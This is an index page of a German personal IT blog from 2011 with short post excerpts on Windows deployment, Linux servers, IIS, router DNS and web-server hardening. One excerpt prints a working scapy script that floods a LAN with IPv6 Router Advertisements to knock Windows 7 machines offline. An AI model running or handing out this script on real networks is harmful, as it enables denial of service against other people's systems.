Windows 7 Deployment via PXE

12. Juni 2011 / ccitt posted in Windows / 1 Comment
Tweet

Eigentlich ist so eine Windows 7 Installation doch recht simple. Man legt die DVD ein, beantwortet die eine oder andere Frage und schon hat man sich ein frisches System gebacken.

Was aber wenn man die DVD nicht findet, oder der Rechner gar kein passendes Laufwerk hat. Neben der Installation über den USB Stick gibt es noch eine elegante Alternative.

Die Grundlage dafür bildet PXE(Preboot Execution Environment) Jeder modere Rechner hat die Möglichkeit über PXE zu booten.

Der Rechner wird also gestartet und PXE sucht nach einem DHCP Server. Der DHCP versorgt den Rechner dann nicht nur mit einer IP sondern auch mit einer Datei die den Bootcode enthält. Diese Datei wird mittels TFTP(Trivial File Transfer Protocol) an den Client gereicht.

Die Vorbereitung

Neben einem Rechner mit Windows 7 brauchen wir noch 2 kostenlose Tools. Das wäre einmal WAIK und einmal TFTPD. TFTPD ist ein DHCP und ein TFTP Server zugleich – also genau das was wir brauchen.

»Read More

NX Server mit Gnome für Linuxkisten

16. Mai 2011 / ccitt posted in Linux / 5 Comments
Tweet

Heute zeige ich euch wie ihr auf einen Debian/Ubuntu - Server eine grafische Oberfläsche installieren könnt. Natürlich will ich nicht verschweigen das ein GUI auf einem Linux Server fehl am Platz ist. Es gibt vereinzelt Ausnahmen welche man aber an einer Hand abzählen kann.

Natürlich frisst so eine GUI Ressourcen und bietet einen weiteren Angriffspunkt für Hacker. Aus diesem Grund sollte man bei Web und/oder Datenbankserver unbedingt darauf verzichten und weiterhin nur mit der klassischen CLI arbeiten.

In diesem Beispiel zeige ich euch wie ihr Gnome auf einen Server mit Debian-Minimalinstallation installiert.

Der Desktop wird dann über einen NX-Server geshared. Bei einem Server mit wenig Ressourcen sollte man statt Gnome eher Fluxbox o.ä. präferieren.

»Read More

Forefront Client Security ohne MOM-Server

16. Mai 2011 / ccitt posted in Security, Windows / No Comments
Tweet

Gerade für kleine Unternehmen ist es interessant Microsofts Malware Schutz Forefront Client Security (FCS) ohne den Forefront Management Server installieren und betreiben zu können. Updates der Software und die neusten Virensignaturen werden dann über den Windows Update Dienst bezogen.

Da bei dieser Lizenzierung die FCS Management Console sowie der Microsoft Operation Manager nicht mit inbegriffen ist, ist eine zentrale Konfiguration und Verwaltung selbstverständlich nicht möglich. Das hat zur Folge das jeder Client per Hand konfiguriert werden muss. Auch die praktische Alert- und Notification-Infrastruktur, sowie das Reporting fällt weg. Genauere Informationen zu diesem Lizenzmodel lassen sich im Partnerportal von Microsoft finden.

»Read More

IIS 7 Part 1 - PHP

14. Mai 2011 / ccitt posted in Windows / No Comments
Tweet

Das funktioniert recht einfach.

Wir installieren den Role Service CGI auf unserem IIS, dazu gehen wir in den Servermanager und wählen den IIS aus. Danach noch auf Add Role und in dem darauf folgendem Dialog wählen wir CGI aus.

Nun laden wir noch die “Non-thread-safePHP Binaries und installieren sie. Danach öffnen wir in die php.ini, welche sich in dem Installationsverzeichniss, befindet und überprüfen ob folgende Einstellungen korrekt gesetzt sind:

»Read More

Windows 7 DoS Attacke mit IPv6 RA

22. April 2011 / ccitt posted in Security, Windows / 3 Comments
Tweet

Das Prinzip ist sehr trivial, es werden IPv6 Router Advertisements(RA) in ein Netz geschickt.
Da RA Pakete Broad bzw bei IPv6 Multicasting Pakete sind wird also jeder Rechner der dieses Paket empfängt es verarbeiten.
Da setzen wir also an.
Also rein in die Konsole und scapy gestartet.
Wir erstellen ein, jetzt folgen ein paar Definitionen an

#Layer, Protokoll sowie das der Pakettyp wird angegeben.
a = IPv6()
a.dst = "ff02::1"
#ICMPv6 Router Advertisement festlegen
b = ICMPv6ND_RA()
#Hier greift ihr euch die HwAddrese(MAC) des jeweiligen Interfaces,
#in meinem Fall eth1, (sollte natürlich angepasst werden) und legt sie fest.
#Die Methode getMac ist eigentlich für ein eigenes Script gedacht
#man kann die Adresse natürlich auch per Hand definieren.
#Dazu einfach  c.lladdr = <MAC-Adresse hier einfügen>
def getMac(ifname):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
info = fcntl.ioctl(s.fileno(), 0x8927,  struct.pack('256s', ifname[:15]))
return ''.join(['%02x:' % ord(char) for char in info[18:24]])[:-1]
c = ICMPv6NDOptSrcLLAddr()
c.lladdr = getMac('eth1')
#MTU sollte 1280 betragen
d = ICMPv6NDOptMTU()
d.show()
#Den IPv6 Prefix festlegen und seine länge festlegen
e = ICMPv6NDOptPrefixInfo()
e.prefixlen = 64
e.prefix = "cc5f::"
#Und das Paket abschicken
send(a/b/c/d/e)
#Thx for the idea to http://samsclass.info

»Read More

Alice Router 1121 DNS ändern

14. April 2011 / ccitt posted in Allgemein / 3 Comments
Tweet

Alice, respektive Hansenet, sperren gerne mal diverse Internetauftritte für Ihre Kunden. Allein diese Tatsache ist schon eine Frechheit, doch kommt noch hinzu das sie dann auf eine eigenen Alice 404 Seite weiterleiten auf der unzählige und schlecht durchschaubare Scripts ablaufen. Ein einfacher Ausweg ist es die DNS Server im Router zu wechseln. Es gibt in so fast jedem OS die Möglichkeit den Nameserver setzen, sollte man aber mehrere Wlan Geräte nutzen ist es wohl der einfachere Weg den Eintrag im Router zu verändern.

Nun gut, fangen wir mal an.

»Read More

Ein wunderschönen guten Morgen!

2. April 2011 / ccitt posted in Allgemein / 5 Comments
Tweet

Fett - mich hat eben die Sonne geweckt anstatt, wie üblich, der Wecker. Endlich wieder gutes Wetter! Ich für meinen Teil werde heut’ wohl die meiste Zeit am Ufer verbringen. Grillfleisch ist genug da, ein Kollege bringt den Grill(den großen *g), der andere was zu trinken. Nun gut, aber warum ich eigentlich schreiben - wie ihr seht steht ein neues Design. Ich hatte mich gestern mal hingesetzt und angefangen zu basteln, ich hoffe es gefällt :)

Ich bin natürlich, wie immer, offen für konstruktive Kritik. Auch würde ich mich über eine kleine Nachricht oder Kommentar freuen, wenn auf dem Blog irgendwo Irgendwas rumbuggt.

»Read More

Bullet: SQLi illustration & explanation

30. März 2011 / ccitt posted in Bullets / 1 Comment
Tweet

SQLi illustration & explanation
Hier gibt es ein kleine Video “SQLi illustration & explanation” von insecurity.ro. Es ist doch ganz nett anzusehen, wie sich der Kerl das Ding noch per Hand zusammen schustert, wohingegen ja die meisten nur noch diverse Browser Plugins benutzen. Vielleicht kann der eine oder andere dabei noch etwas lernen:
Klicke hier um das Video anzusehen

Slowloris DoS auf Apache abwehren

30. März 2011 / ccitt posted in Linux, Security / 1 Comment
Tweet

Gestern - ein Thread auf HBA - ein User versucht mehr schlecht als recht zu erklären wie man das Perl Script Slowloris anwendet. Dabei kam ich auf die Idee ein Blogeintrag zu schreiben wie man einen Slowloris Angriff abwehren kann, bzw. präventive Einstellung an seinem Webserver vornehmen kann.
Slowloris ist ein DoS Script in Perl welches darauf abzielt diverse Webservertypen lahm zu legen.
Es ist eigentlich eine ziemlich einfache Geschichte, wenn man weiß wie Slowloris arbeitet. Wir gehen also in die Shell und setzten folgende 4 iptables Regeln.

»Read More

Neues Betriebssystem

21. März 2011 / ccitt posted in Allgemein / No Comments
Tweet

Moin.

ich hatte Samstag Abend nichts vor, und da kam ich auf die Idee mal den Ubuntuserver ausprobieren. Gesagt getan. Erstmal hab ich mir ein Backup von der MySQL Datenbank nach hause gezogen, und dann über das Strato Panel ein komplettes Server Backup auf einen FTP. Nach kurzen Startschwierigkeiten mit WordPress(man sollte das WP-Installationsscript immer vor dem Import der Datenbank starten*g*) lief dann alles wieder tadellos. Schnell noch Plesk abgeschaltet und alles war super.

Als Webserver wollt ich eigentlich Lighttp nutzen, bin dann aber doch wieder auf den vertrauten Apache zurück. Ich weiß nicht, Apache hat es mir einfach angetan, auch wenn lighttp für so einen kleinen Blog wohl besser geeignet wäre.

Naja, dann machs mal gut,

greetz, CCiTT

« Older Posts